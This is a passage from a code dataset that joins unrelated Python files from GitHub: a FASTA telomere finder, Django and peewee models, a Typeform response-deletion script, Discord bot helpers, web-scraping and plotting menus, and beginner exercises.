True\n","repo_name":"mumarkhan999/news_ycombinator_scrapper","sub_path":"database/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2474570679","text":"import os\nimport sys\nfrom Bio import SeqIO\nimport re\nimport argparse\n#--------------------------------------------\n#--------------------------------------------\n#--------------------------------------------\n# Canonical motif is TTAGGG/CCCTAA, but one might see variation\nTELOMERES = [\"C{2,4}T{1,2}A{1,3}\", \"T{1,3}A{1,2}G{2,4}\"]\n#--------------------------------------------\n#--------------------------------------------\n#--------------------------------------------\ndef findTelomere(sequence):\n '''\n This function takes a nucleotide sequence and checks if the \n start and/or end of the sequence contain telomeric repeats.\n '''\n telomere_at_start, telomere_at_end = False, False\n tel_forward, tel_reverse = TELOMERES[0], TELOMERES[1]\n\n for index, position in enumerate(sequence.upper()):\n if position != 'N':\n start_of_sequence_withoutNs = index\n break\n\n for index, position in enumerate(reversed(sequence.upper())):\n if position != 'N':\n end_of_sequence_withoutNs = index\n break\n end_of_sequence_withoutNs = len(sequence) - end_of_sequence_withoutNs\n\n # Look for telomeric repeats at the start of the sequence\n telomeric_repeats = re.findall(tel_forward, sequence.upper()[start_of_sequence_withoutNs:start_of_sequence_withoutNs+WINDOW])\n # Calculate the % of nucleotides that are part of telomeric repeats\n percent_telomeric_repeats_start = 100.0*sum([len(repeat) for repeat in telomeric_repeats])/float(WINDOW)\n\n # Look for telomeric repeats at the end of the sequence\n telomeric_repeats = re.findall(tel_reverse, sequence.upper()[(end_of_sequence_withoutNs-WINDOW):end_of_sequence_withoutNs])\n # Calculate the % of nucleotides that are part of telomeric repeats \n percent_telomeric_repeats_end = 100.0*sum([len(repeat) for repeat in telomeric_repeats])/float(WINDOW) \n\n # If more than half of nucleotides at the start/end are telomeric repeats\n if percent_telomeric_repeats_start >= REPEAT_CUTOFF:\n telomere_at_start = True\n if percent_telomeric_repeats_end >= REPEAT_CUTOFF:\n telomere_at_end = True\n \n return telomere_at_start, telomere_at_end, start_of_sequence_withoutNs, end_of_sequence_withoutNs\n#--------------------------------------------\n#--------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument(\"FASTA_FILE\", help=\"Supply a FASTA sequence file.\")\nparser.add_argument(\"-w\", \"--window\", type=int, help=\"This defines the number of first and last nucleotides that will get scanned for telomeric repeats (default: 50).\")\nparser.add_argument(\"-c\", \"--cutoff\", type=float, help='''A telomere is detected if >= c%% of the first (last) nucleotides are telomeric repeats (default: 50%%).''')\nargs = parser.parse_args()\n#--------------------------------------------\nif args.cutoff == None:\n REPEAT_CUTOFF = 50.0\nelse:\n REPEAT_CUTOFF = args.cutoff\n\nif args.window == None:\n WINDOW = 50\nelse:\n WINDOW = args.window\n#--------------------------------------------\nFASTA_FILE = args.FASTA_FILE\n#--------------------------------------------\nsequences = [(str(record.description), str(record.seq).strip()) for record in SeqIO.parse(FASTA_FILE, \"fasta\")]\n\nnumber_forward, number_reverse = 0, 0\nprint('##########')\nprint(len(sequences), 'sequences to analyze for telomeric repeats (TTAGGG/CCCTAA) in file', FASTA_FILE)\nprint('##########')\nprint()\n#--------------------------------------------\nfor header, sequence in sequences:\n if sequence.count('N') == len(sequence):\n pass\n else:\n forward, reverse, start_of_sequence_withoutNs, end_of_sequence_withoutNs = findTelomere(sequence)\n\n if forward == True:\n print(header, '\\t', 'Forward (start of sequence)', '\\t', sequence[start_of_sequence_withoutNs:start_of_sequence_withoutNs+WINDOW])\n number_forward += 1\n if reverse == True: \n print(header, '\\t', 'Reverse (end of sequence)', '\\t', sequence[(end_of_sequence_withoutNs-WINDOW):end_of_sequence_withoutNs])\n number_reverse += 1\n\nprint((\"\\nTelomeres found: {} ({} forward, {} reverse)\".format(str(number_forward+number_reverse),number_forward,number_reverse)))\n#--------------------------------------------\n","repo_name":"JanaSperschneider/FindTelomeres","sub_path":"FindTelomeres.py","file_name":"FindTelomeres.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"75"} +{"seq_id":"6379829213","text":"import os\nimport peewee as pw\nimport datetime\nfrom database import db\n\n\nclass BaseModel(pw.Model):\n created_at = pw.DateTimeField(default=datetime.datetime.now)\n updated_at = pw.DateTimeField(default=datetime.datetime.now)\n\n def save(self, *args, **kwargs):\n self.updated_at = datetime.datetime.now()\n return super(BaseModel, self).save(*args, **kwargs)\n\n class Meta:\n database = db\n # False is to set our db table names in snake convention (base_model). if true (default), naming will be no convention (basemodel) hence ignore_tables wont be able to detect, and basemodel WONT be ignored.\n legacy_table_names = False\n\n\nclass Store(BaseModel):\n store_id = pw.AutoField()\n name = pw.CharField(unique=True)\n\n\nclass Warehouse(BaseModel):\n warehouse_id = pw.AutoField()\n location = pw.TextField()\n store = pw.ForeignKeyField(Store, backref='sel_wh')\n\n\nclass Product(BaseModel):\n product_id = pw.AutoField()\n name = pw.CharField(index=True)\n description = pw.TextField(null=True)\n color = pw.CharField(null=True)\n warehouse = pw.ForeignKeyField(Warehouse, backref='sel_prod')\n","repo_name":"dwihdyn/inv-mgmt-system","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6564156006","text":"import requests\r\nimport lxml.html as lh\r\nimport bs4\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nfrom sqlalchemy import create_engine\r\nimport pymysql.cursors\r\n\r\nfrom IPython import get_ipython\r\nipy = get_ipython()\r\nif ipy is not None:\r\n ipy.run_line_magic('matplotlib', 'inline')\r\n\r\nurl2 = \"https://www.foxsports.com.co\"\r\nurl = \"https://pokemondb.net/pokedex/all\"\r\n\r\ndef Menu():\r\n print(\"\\n\")\r\n print(\"1. Mostrar Etiquetas\")\r\n print(\"2. Ver Codigo Fuente\")\r\n print(\"3. Graficar Tabla de Posiciones\")\r\n print(\"4. Mostrar Base de Datos\")\r\n print(\"0. Salir\")\r\n opcion = input(\"\\nSeleccione una opcion \")\r\n MenuOpciones(opcion)\r\n\r\ndef MenuOpciones(opcion):\r\n if(opcion == \"1\"):\r\n MenuEtiquetas()\r\n elif(opcion == \"2\"):\r\n CodigoFuente()\r\n elif(opcion == \"3\"):\r\n Graficar()\r\n elif (opcion == \"4\"):\r\n BaseDatos()\r\n else:\r\n print(\"1\")\r\n\r\ndef MenuEtiquetas():\r\n etiqueta = input(\"Que etiqueta desea mostrar? \")\r\n Etiquetas(etiqueta)\r\n\r\ndef Etiquetas(etiqueta):\r\n print(\"\\n\")\r\n html = urlopen(url2)\r\n soup = BeautifulSoup(html, 'html5lib')\r\n type(soup)\r\n print('\\n'.join(strong.text for strong in soup.select(etiqueta)))\r\n\r\ndef CodigoFuente():\r\n print(\"\\n\")\r\n html = urlopen(url2)\r\n soup = BeautifulSoup(html, 'html5lib')\r\n type(soup)\r\n print(soup.get_text())\r\n\r\ndef Graficar():\r\n print(\"\\n\")\r\n pagina = requests.get(url)\r\n documento = lh.fromstring(pagina.content)\r\n tr = documento.xpath('//tr')\r\n\r\n columnas = []\r\n i = 0\r\n for t in tr[0]:\r\n i += 1\r\n nombre = t.text_content()\r\n columnas.append((nombre, []))\r\n\r\n for j in range(1, len(tr)):\r\n T = tr[j]\r\n if len(T) != 10:\r\n break\r\n\r\n i = 0\r\n for t in T.iterchildren():\r\n informacion = t.text_content()\r\n if i > 0:\r\n try:\r\n informacion = int(informacion)\r\n except:\r\n pass\r\n columnas[i][1].append(informacion)\r\n i += 1\r\n\r\n Tabla = {title: column for (title, column) in columnas}\r\n df = pd.DataFrame(Tabla)\r\n nuevo_df = df.iloc[0:10]\r\n nombres = nuevo_df['Name']\r\n ataques = nuevo_df['Attack']\r\n plt.pie(ataques, labels=nombres, autopct='%1.1f%%', shadow=True, startangle=90)\r\n plt.axis('equal')\r\n plt.show()\r\n\r\ndef BaseDatos():\r\n nombres = []\r\n ataques = []\r\n\r\n conexion = pymysql.connect(host='localhost',user='root',password='123456',db='nada',charset='utf8mb4',cursorclass=pymysql.cursors.DictCursor)\r\n try:\r\n with conexion.cursor() as cursor:\r\n consulta = \"SELECT `nombre`, `ataque` FROM `informacion`\"\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall()\r\n for row in resultado:\r\n nombres.append(row[\"nombre\"])\r\n ataques.append(row[\"ataque\"])\r\n finally:\r\n conexion.close()\r\n\r\n plt.pie(ataques, labels=nombres, autopct='%1.1f%%', shadow=True, startangle=90)\r\n plt.axis('equal')\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n Menu()","repo_name":"nataliaisazaa/taller_python","sub_path":"taller.py","file_name":"taller.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39023347748","text":"myListNum1 = [1,2,3,4,5,6,7,8]\nlistCitiesKg = ['Bishkek', 'Talas', 'Osh', 'JA', 'Naryn', 'Balykchy', 'Leilek']\nmixedList = [12, 4, 'b', 23, 'hello', 77, 12, 'Aman']\n\n# Iterating elements inside a list\ni = 0\nwhile i < len(listCitiesKg):\n print(f'{i} city: {listCitiesKg[i]}')\n i += 1\n\nprint(i)\n\ni= 0\nwhile i < len(myListNum1):\n print(f'The square {myListNum1[i]} of number is: {myListNum1[i] **2}')\n i += 1\n\n# For cycle\nlistCitiesKg = ['Bishkek', 'Talas', 'Osh', 'JA', 'Naryn', 'Balykchy', 'Leilek']\ncounterFor = 0\nfor i in listCitiesKg:\n print(f'City {counterFor + 1}: {i}')\n counterFor += 1\n\nmyListNum1 = [1,2,5,4,9,6,7,8]\n\ny = 0\nfor number in myListNum1:\n print(f' The square of number{y + 1}: {number ** 2}')\n y +=1\n\nlist1 = list(range(5,10))\nlist2 = [5,6,7,8,9]\nif list1 == list2:\n print('They are the same')\nelse:\n print('Not the same')\n\n# compare to < >, <= or >=\n# Chem menshe spisok to on schitaetsya bolshe\nlist1 = list(range(5,50))\nlist2 = [5,6,7,8,9,25,100]\nif list1 > list2:\n print('First list greater than list2')\nelse:\n print('List2 greater than list1')\n\nif list1 < list2:\n print('List1 smaller than list2')\nelse:\n print('List2 smaller than list1')","repo_name":"NazgulM/Python_organized","sub_path":"Lesson 3 - List Methods/ListCycle.py","file_name":"ListCycle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72950355123","text":"from app import app\nfrom flask_restful import Api\n\nfrom resources.jobs.jobs import Job_queue, FilesResource, \\\n DownloadFilesResource, CopyChewSchema, SetNGSOntoOutput, \\\n FlowcraftInspect, CheckControllerResource, FlowcraftParams, \\\n FlowcraftBuildTest\nfrom resources.downloads.downloads import DownloadResults\n\n# Setup API\napi = Api(app)\n\napi.add_resource(Job_queue, '/jobs/')\n\n# Check for resource availability\napi.add_resource(CheckControllerResource, '/jobs/check/')\n\n# trigger flocraft inspect\napi.add_resource(FlowcraftInspect, '/jobs/inspect')\n\n# check flowcraft tags params\napi.add_resource(FlowcraftParams, '/jobs/protocols/params/')\n\n# test flowcraft build on workflow\napi.add_resource(FlowcraftBuildTest, '/jobs/workflow/test/')\n\n# get files from user\napi.add_resource(FilesResource, '/jobs/fastqs/')\n\n# set parameters of NGSOnto\napi.add_resource(SetNGSOntoOutput, '/jobs/setoutput/')\n\n# download files to user area\napi.add_resource(DownloadFilesResource, '/jobs/download/')\n\n# download files to user area\napi.add_resource(DownloadResults, '/jobs/results/download/')\n\n# get files from user\napi.add_resource(CopyChewSchema, '/jobs/schema/copy/')\n","repo_name":"bfrgoncalves/INNUENDO_PROCESS_CONTROLLER","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"3986958471","text":"import os\nimport requests\nfrom datetime import datetime\n\n\nclass ScriptError(Exception):\n \"\"\"\n Something went wrong in the script, details can be found in the \"message\" attribute\n \"\"\"\n pass\n\n\n# Authentication header class for requests\nclass TokenAuth(requests.auth.AuthBase):\n \"\"\"\n Authentication class for requests.\n Adds a bearer token to the Authorization header\n \"\"\"\n def __init__(self, token):\n self.token = token\n\n def __call__(self, request):\n request.headers['Authorization'] = f'Bearer {self.token}'\n return request\n\n\nclass DeleteResponses:\n \"\"\"\n A class encapsulating the logic for deleting all the responses in every form contained within the authenticated\n Typeform account.\n \"\"\"\n\n TYPEFORM_API = 'https://api.typeform.com/forms'\n\n def __init__(self, auth_token):\n \"\"\"\n Initialize a class instance, setting the authentication token for making requests to TypeForm\n\n :param auth_token: str\n The token for making requests to TypeForm. Must have at least the following scopes:\n Forms: Read\n Responses: Read, Write\n\n :raises ScriptError\n If no auth_token provided to constructor\n \"\"\"\n if not auth_token:\n raise ScriptError('auth_token not provided')\n\n self.token_auth = TokenAuth(auth_token)\n\n def decode_json(self, response):\n \"\"\"\n Attempt to decode the JSON payload and exit with error if it fails\n\n :param response: requests.Response\n The response object from a requests request to convert into a dict\n :return: dict\n The dict representation of the JSON response\n :raises ScriptError:\n If payload is not valid JSON\n \"\"\"\n try:\n return response.json()\n except ValueError as err:\n print('*****************\\n'\n '*Invalid Payload*\\n'\n '*****************\\n'\n f'{response.content}')\n raise ScriptError(f'Failed to decode json payload for {response.request.method} {response.url}: {err}')\n\n def get_forms_by_page(self, page):\n \"\"\"\n Make an HTTP GET request to list a given page of forms in the authenticated Typeform account\n API docs: https://developer.typeform.com/create/reference/retrieve-forms/#retrieve-forms\n\n :param page: int\n The page to fetch from the endpoint (will handle up to 200 forms per page)\n :return: (list, int)\n A tuple of the list of forms returned and the number of pages available to query.\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n forms_response = requests.get(\n f'{self.TYPEFORM_API}',\n auth=self.token_auth,\n params={\n 'page': page,\n 'page_size': 200\n }\n )\n\n if forms_response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to get list of forms: {forms_response.reason} - {forms_response.status_code}')\n\n json_response = self.decode_json(forms_response)\n\n return json_response['items'], json_response['page_count']\n\n def get_form_responses_by_page(self, form_id, page):\n \"\"\"\n Make an HTTP GET request for a single page of a forms' responses. Up to 1000 per page.\n API docs: https://developer.typeform.com/responses/reference/retrieve-responses/#retrieve-responses\n\n :param form_id: str\n The Typeform form's identifier\n :param page: int\n The page number to request\n :return: (list, int)\n A tuple containing the list of response IDs and the number of pages available to query.\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n response = requests.get(\n f'{self.TYPEFORM_API}/{form_id}/responses',\n auth=self.token_auth,\n params={\n 'page_size': 1000,\n }\n )\n\n if response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to retrieve responses for form: {form_id} - {response.status_code}')\n\n json_response = self.decode_json(response)\n\n # map the responses so we only have their IDs & Convert the map generator object into a proper list\n response_ids = list(map(lambda item: item['response_id'], json_response['items']))\n\n return response_ids, json_response['page_count']\n\n def get_form_id_list(self):\n \"\"\"\n Fetch all forms in the account, one page at a time, concatenating all the pages together into a single list.\n\n :return: list\n A list of form ID strings\n \"\"\"\n form_list = []\n\n response_forms, page_count = self.get_forms_by_page(1)\n form_list.extend(response_forms)\n\n if page_count > 1:\n for next_page in range(2, page_count + 1):\n response_forms, _ = self.get_forms_by_page(next_page)\n form_list.extend(response_forms)\n\n # map the list of forms into just form IDs and convert the map into a list.\n return list(map(lambda form_item: form_item['id'], form_list))\n\n def get_form_responses(self, form_id):\n \"\"\"\n Get all responses for a form, one page at a time and concatenating the lists of response IDs together\n\n :param form_id: str\n The string identifier for a form, whose responses will be requested\n :return: list\n A list of string identifiers representing every response in a form\n \"\"\"\n response_ids = []\n\n responses, page_count = self.get_form_responses_by_page(form_id, 1)\n response_ids.extend(responses)\n\n if page_count > 1:\n for current_page in range(2, page_count + 1):\n responses, _ = self.get_form_responses_by_page(form_id, current_page)\n response_ids.extend(responses)\n\n return response_ids\n\n def delete_responses(self, form_id, response_ids):\n \"\"\"\n Make an HTTP DELETE request to delete all the responses identified in response_ids\n\n API docs: https://developer.typeform.com/responses/reference/delete-responses/#delete-responses\n\n :param form_id: str\n The string identifier of a Typeform form\n :param response_ids: list\n A list of response ID strings that will be deleted\n :return: None\n :raises ScriptError:\n If a non-OK status code is received from Typeform\n \"\"\"\n del_response = requests.delete(\n f'{self.TYPEFORM_API}/{form_id}/responses',\n auth=self.token_auth,\n params={\n 'included_tokens': response_ids\n }\n )\n\n if del_response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to delete responses for form: {form_id} - {del_response.status_code}')\n\n def delete_form_responses(self, form_id, response_ids):\n \"\"\"\n Delete all responses for a form in batches of 25 ids (The request to delete responses has IDs in the query, so limiting it to something reasonably small)\n\n :param form_id:\n The string identifier of a Typeform form\n :param response_ids:\n A list of all response ID strings for the given Typeform form\n :return: None\n \"\"\"\n num_to_delete = len(response_ids)\n while len(response_ids) > 0:\n to_del = response_ids[:25]\n response_ids = response_ids[25:]\n self.delete_responses(form_id, to_del)\n\n print(f'Deleted {num_to_delete} responses from form {form_id}')\n\n def execute(self):\n \"\"\"\n Kicks off the chain of calls that glues every step together.\n\n 1. Fetch all forms (by page if necessary)\n 2. For each form, fetch all responses (by page if necessary)\n 3. For each form, delete all responses (in batches of 25)\n\n :return: None\n \"\"\"\n try:\n # Get the list of form IDs\n form_id_list = self.get_form_id_list()\n\n if len(form_id_list) == 0:\n print('No forms in account')\n exit(0)\n\n # For each form, fetch the list of response IDs and delete them\n for form_id in form_id_list:\n form_responses = self.get_form_responses(form_id)\n self.delete_form_responses(form_id, form_responses)\n except ScriptError as err:\n print(f'Failed to execute: {err.message}')\n\n\nif __name__ == '__main__':\n # If the script is called directly, instantiates and executes the process\n if 'TYPEFORM_AUTH_TOKEN' not in os.environ:\n print('You must set TYPEFORM_AUTH_TOKEN')\n exit(1)\n\n # Check the day of the week\n if not datetime.today().weekday() == 0:\n print('This task runs only on Monday')\n exit(0)\n\n delete_responses = DeleteResponses(os.environ['TYPEFORM_AUTH_TOKEN'])\n delete_responses.execute()\n","repo_name":"MozillaFoundation/mofo-cron","sub_path":"tasks/typeform/delete_responses.py","file_name":"delete_responses.py","file_ext":"py","file_size_in_byte":9111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21849066958","text":"import colorama\r\nimport discord\r\nimport files.information\r\nfrom colorama import init, Fore, Back, Style\r\nfrom files.information import prefix\r\ninit(autoreset=True)\r\nprint(__name__ + '.py ' + Fore.GREEN + 'loaded')\r\n\r\n# error_function print format\r\nasync def error_function(function_name, error_type, message, author, bot):\r\n await bot.send_message(author,'Error : '+error_type+', '+function_name+' Function\\n```Input : '+message.content+'```')\r\n print(Fore.RED+'Error : '+error_type+Fore.RESET+', '+Fore.YELLOW+function_name+Fore.RESET+' Function')\r\n\r\n# bool, message_sw,\r\ndef message_sw(message, cmd_1, cmd_2 = None):\r\n if cmd_1 and cmd_2:\r\n if message.content.startswith(prefix+cmd_1) or message.content.startswith(prefix+cmd_2):\r\n return True\r\n elif cmd_1:\r\n if message.content.startswith(prefix+cmd_1):\r\n return True\r\n else:\r\n return False\r\n\r\n# bool, checks for id\r\ndef is_owner(message):\r\n if message.author.id == message.server.owner.id:\r\n return True\r\n else:\r\n return False\r\n\r\n# bool, checks for roles\r\ndef has_roles(message, role_1, role_2 = None):\r\n has_role_1 = discord.utils.get(message.server.roles, name=role_1)\r\n print(str(role_1))\r\n print(str(has_role_1))\r\n if role_1 and role_2:\r\n has_role_2 = discord.utils.get(message.server.roles, name=role_2)\r\n for i in message.author.roles:\r\n if i == has_role_1 or i == has_role_2:\r\n return True\r\n elif role_1:\r\n for i in message.author.roles:\r\n if i == has_role_1:\r\n return True\r\n else:\r\n return False\r\n","repo_name":"drumman22/drum-bot","sub_path":"drum-bot/files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"34383027726","text":"import json\n\nfrom database import Session\nfrom models import Category, Goods\nfrom util import default_all, default_one\n\n\ndef all(limit):\n return default_all(Category, Category.id, limit)\n\n\ndef one(id):\n return default_one(Category, id)\n\n\ndef add(info):\n s = Session()\n\n try:\n # check if category with the same title exists\n q = s.query(Category).filter(Category.title == info.get('title'))\n if q.count() > 0:\n # exists\n cat = q.one()\n if cat.for_sale:\n # the existing category is for sale, meaning duplicated category\n raise Exception\n\n # update the info, and make the category for sale\n info['for_sale'] = True\n result = json.loads(update(q.one().id, info))\n result['id'] = cat.id\n else:\n # does not exist, then create a new one\n cat = Category(**info)\n s.add(cat)\n s.commit()\n result = {'ok': True, 'id': cat.id}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n\n\ndef update(id, info):\n s = Session()\n\n try:\n # check if the category exists\n q = s.query(Category).filter(Category.id == id)\n if q.count() < 1:\n # does not exist\n raise Exception\n\n # update it\n q.update(info)\n s.commit()\n\n result = {'ok': True}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n\n\ndef delete(id):\n s = Session()\n\n try:\n # check if category with the same title exists\n q = s.query(Category).filter(Category.id == id)\n if q.count() < 1:\n # does not exist\n raise Exception\n\n if not q.one().for_sale:\n # not for sale, meaning already deleted\n raise Exception\n\n # get all goods in this category\n goods = q.one().goods\n\n # make this category not for sale\n q.update({'for_sale': False})\n\n # make all goods in this category not for sale\n for g in goods:\n q = s.query(Goods).filter(Goods.id == g.id)\n q.update({'for_sale': False})\n\n s.commit()\n\n result = {'ok': True}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n","repo_name":"richardchien/project-sally-backend","sub_path":"api_handler/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"617095942","text":"'''\n1. 题目说明:\n请开启PYD602.py档案,依下列题意进行作答,输出并计算五张牌总和,使输出值符合题意要求。作答完成请另存新档为PYA602.py再进行评分。\n\n2. 设计说明:\n请撰写一程式,让使用者输入52张牌中的5张,计算并输出其总和。\n\n提示:J、Q、K以及A分别代表11、12、13以及1。\n\n3. 输入输出:\n输入说明\n5张牌数\n\n输出说明\n5张牌的数值总和\n\n输入输出范例\n范例输入\n5\n10\nK\n3\nA\n范例输出\n32\n'''\ncards = []\nresult = 0\nfor i in range(5):\n cards.append(input())\n\nfor i in range(5):\n if cards[i] == 'A': result += 1\n elif cards[i] == \"J\": result += 11\n elif cards[i] == \"Q\": result += 12\n elif cards[i] == \"K\": result += 13\n elif cards[i] == \"10\": result += 10\n else:\n result += eval(cards[i])\nprint(result)","repo_name":"roberthsu2003/python","sub_path":"TQC/PYD602.py","file_name":"PYD602.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"zh","doc_type":"code","stars":183,"dataset":"github-code","pt":"75"} +{"seq_id":"6609022517","text":"from utils.exceptions import FloatError, NotInMenuError\n\ndef inputText() -> list[str]:\n with open(\"laba12/input.txt\", encoding=\"UTF-8\") as f: \n lines = f.read()\n text = lines.split('\\n')\n return text\n\ndef validateInput(prompt, start, end) -> int:\n while True:\n try:\n num = float(input(prompt))\n if int(num) != num:\n raise FloatError\n if not(start <= int(num) <= end):\n raise NotInMenuError\n return int(num)\n except FloatError:\n print(\"Введенное число должно быть целым!\")\n except ValueError:\n print(\"Введенное должно быть числом!\")\n except NotInMenuError:\n print(\"Такого значения нет в меню!\")\n \n\ndef getUsersChoiceFromMenu() -> int:\n prompt = (\"\"\"\\nМеню:\n1. Выровнять текст по левому краю\n2. Выровнять текст по правому краю\n3. Выровнять текст по ширине\n4. Удаление всех вхождений заданного слова\n5. Замена одного слова другим во всем тексте\n6. Выполнение умножения и деления в тексте\n7. Самое короткое предложение по кол-ву слов\n0. Выход\\n\"\"\")\n print(prompt)\n res = validateInput(\"Выберите пункт меню: \", 0, 7)\n return res\n\n\ndef printText(text: list[str], ignore: int = -1) -> None:\n print()\n string = \"\"\n sentenceIndex = 1\n for line in text:\n for c in line:\n if c == \".\":\n sentenceIndex += 1\n if sentenceIndex != ignore:\n string += c\n if sentenceIndex != ignore:\n string += '\\n'\n print(string)\n","repo_name":"ofdun/BMSTU-Programming","sub_path":"laba12/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14561679490","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom messenger_users import models as user_models\nfrom posts.models import Post, Interaction\nfrom dateutil import parser, relativedelta\nfrom attributes.models import Attribute\nfrom programs.models import Program\nfrom entities.models import Entity\nfrom django.utils import timezone\nfrom areas.models import Area\nimport datetime\nfrom django.db import models\nfrom django.db.models.aggregates import Max\n\n\nclass Instance(models.Model):\n entity = models.ForeignKey(Entity, on_delete=models.CASCADE)\n name = models.TextField()\n attributes = models.ManyToManyField(Attribute, through='AttributeValue')\n program = models.ForeignKey(\n Program, on_delete=models.DO_NOTHING, null=True)\n sessions = models.ManyToManyField(Session)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n permissions = (\n ('view_all_instances', 'User can view all instances'),\n )\n\n def __str__(self):\n return self.name\n\n def get_users(self):\n return user_models.User.objects \\\n .filter(id__in=set(assoc.user_id for assoc in self.instanceassociationuser_set.all()))\n\n def get_months(self):\n if self.entity_id == 1:\n births = self.attributevalue_set.filter(attribute__name='birthday')\n if not births.exists():\n return None\n birth = births.last()\n print(self)\n print(birth)\n try:\n birthday = parser.parse(birth.value)\n if timezone.is_aware(birthday):\n now = timezone.now()\n else:\n now = datetime.datetime.now()\n rd = relativedelta.relativedelta(now, birthday)\n if rd.months:\n months = rd.months\n else:\n months = 0\n if rd.years:\n months = months + (rd.years * 12)\n return months\n except:\n return None\n elif self.entity_id == 2:\n pregnant_weeks = self.attributevalue_set.filter(\n attribute__name='pregnant_weeks')\n if not pregnant_weeks.exists():\n return None\n pw = pregnant_weeks.last()\n months = round(int(pw.value) / 4)\n if months == 0:\n months = -1\n return months\n else:\n return None\n\n def get_weeks(self):\n if self.entity_id == 2:\n pregnant_weeks = self.attributevalue_set.filter(\n attribute__name='pregnant_weeks')\n if not pregnant_weeks.exists():\n return None\n pw = pregnant_weeks.last()\n weeks = int(pw.value)\n if weeks == 0:\n weeks = -1\n return weeks\n else:\n return None\n\n def get_time_feeds(self, first_limit, last_limit):\n feeds = self.instancefeedback_set.filter(\n created_at__gte=first_limit, created_at__lte=last_limit)\n return feeds\n\n def get_time_interactions(self, first_limit, last_limit):\n interactions = Interaction.objects.filter(created_at__gte=first_limit, created_at__lte=last_limit,\n instance_id=self.pk)\n return interactions\n\n\n def get_activities(self):\n posts = Post.objects.filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)]))\\\n .only('id', 'name')\n for post in posts:\n post.assign = Interaction.objects.filter(\n post_id=post.id, type='dispatched', instance_id=self.pk).last()\n sessions = Interaction.objects.filter(\n post_id=post.id, type='session', instance_id=self.pk)\n if sessions.count() > 0:\n post.completed = sessions.last()\n else:\n post.completed = None\n return posts\n\n def get_activities_area(self, area, first_limit, last_limit):\n if area > 0:\n posts = Post.objects.\\\n filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)\n .filter(created_at__gte=first_limit, created_at__lte=last_limit, type='session')])) \\\n .filter(area_id=area).only('id', 'name')\n else:\n posts = Post.objects. \\\n filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)\n .filter(created_at__gte=first_limit, created_at__lte=last_limit, type='session')])) \\\n .only('id', 'name')\n return posts\n\n def get_completed_activities(self, tipo='session'):\n posts = Post.objects\\\n .filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk, type=tipo)]))\\\n .only('id')\n return posts\n\n def get_attributes(self):\n attributes_ids = set(item.pk for item in self.attributes.all())\n attributes = Attribute.objects.filter(id__in=attributes_ids)\n for attribute in attributes:\n attribute.assign = self.attributevalue_set.filter(\n attribute=attribute).last()\n return attributes\n\n def get_attribute_values(self, name):\n attribute = self.attributevalue_set.filter(attribute__name=name)\n if not attribute.count() > 0:\n return None\n return attribute.last()\n\n def is_session_active(self):\n sessions = self.sessions.filter(\n created_at__gte=timezone.now() - datetime.timedelta(days=7))\n return sessions.exists()\n\n# Child Association with parent\n\n\nclass InstanceAssociationUser(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n user = models.ForeignKey('messenger_users.User',\n on_delete=models.CASCADE, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Score(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.FloatField(default=0, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.instance.name + '__' + self.area.name + '__' + str(round(self.value, 2))\n\n\nclass ScoreTracking(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.FloatField(default=0, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def 